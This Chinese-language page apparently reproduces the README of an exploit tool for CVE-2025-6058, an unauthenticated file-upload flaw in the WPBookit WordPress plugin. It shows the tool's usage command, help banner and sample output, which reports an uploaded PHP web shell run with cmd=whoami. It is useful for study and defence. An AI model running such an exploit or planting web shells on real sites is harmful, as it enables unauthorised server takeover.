WPBookit <= 1.0.4 未授权任意文件上传漏洞利用

本文详细介绍了CVE-2025-6058漏洞,该漏洞影响WordPress的WPBookit插件(版本<=1.0.4),允许未授权攻击者上传任意文件,可能导致远程代码执行,CVSS评分为9.8分(严重)。

⚡ WPBookit <= 1.0.4 - 未授权任意文件上传


📝 描述

WordPress的WPBookit插件在所有版本(包括1.0.4)中,由于image_upload_handle()函数缺少文件类型验证,该函数通过add_booking_type路由挂接,导致存在任意文件上传漏洞。
此漏洞允许未授权攻击者向受影响站点的服务器上传任意文件,可能导致远程代码执行

CVE CVSS 评分 公开发布日期 最后更新日期
CVE-2025-6058 9.8(严重) 2025年7月11日 2025年7月12日

🚀 此漏洞利用工具的功能

此漏洞利用工具自动化以下过程:

  • 检测目标是否运行易受攻击的WPBookit版本(<= 1.0.4)
  • 使用易受攻击的路由上传PHP shell,无需身份验证
  • 确认shell上传并提供其确切路径以进行远程命令执行

🛠️ 使用方法

1
python3 CVE-2025-6058.py -u http://target.com/wordpress

🖥️ 示例

1
python3 CVE-2025-6058.py -u http://target.com/wordpress

🆘 帮助与横幅示例

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
python CVE-2025-6058.py -help

  ______   __     __  ________       ______    ______    ______   _______            ______    ______   _______    ______  
 /      \ /  |   /  |/        |     /      \  /      \  /      \ /       |          /      \  /      \ /       |  /      \ 
/$$$$$$  |$$ |   $$ |$$$$$$$$/     /$$$$$$  |/$$$$$$  |/$$$$$$  |$$$$$$$/          /$$$$$$  |/$$$$$$  |$$$$$$$/  /$$$$$$  |
$$ |  $$/ $$ |   $$ |$$ |__  ______$$____$$ |$$$  \$$ |$$____$$ |$$ |____   ______ $$ \__$$/ $$$  \$$ |$$ |____  $$ \__$$ |
$$ |      $$  \ /$$/ $$    |/      |/    $$/ $$$$  $$ | /    $$/ $$      \ /      |$$      \ $$$$  $$ |$$      \ $$    $$< 
$$ |   __  $$  /$$/  $$$$$/ $$$$$$//$$$$$$/  $$ $$ $$ |/$$$$$$/  $$$$$$$  |$$$$$$/ $$$$$$$  |$$ $$ $$ |$$$$$$$  | $$$$$$  |
$$ \__/  |  $$ $$/   $$ |_____     $$ |_____ $$ \$$$$ |$$ |_____ /  \__$$ |        $$ \__$$ |$$ \$$$$ |/  \__$$ |$$ \__$$ |
$$    $$/    $$$/    $$       |    $$       |$$   $$$/ $$       |$$    $$/         $$    $$/ $$   $$$/ $$    $$/ $$    $$/ 
 $$$$$$/      $/     $$$$$$$$/     $$$$$$$$/  $$$$$$/  $$$$$$$$/  $$$$$$/           $$$$$$/   $$$$$$/   $$$$$$/   $$$$$$/  
                                                                                                                           
                                                                                                                           
                                                                                                                           

Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited

usage: CVE-2025-6058.py [-h] -u URL

CVE-2025-6058 WPBookit <= 1.0.4 - 未授权任意文件上传 | by Khaled Alenazi (Nxploited)

options:
  -h, --help     显示此帮助信息并退出
  -u, --url URL  目标URL,例如 http(s)://target.com/wordpress

📤 输出

1
2
3
4
5
[*] 检查插件版本 ...
[*] 利用文件上传 ...
[+] 利用成功!
[+] Shell路径wp-content/uploads/2025/07/shell.php?cmd=whoami
Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited

⚠️ 免责声明

此工具仅用于教育和授权的安全测试目的
作者不对任何滥用或未经授权的活动负责。
使用风险自负,并始终确保您有权限测试目标系统。


作者:Khaled Alenazi (Nxploited)

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计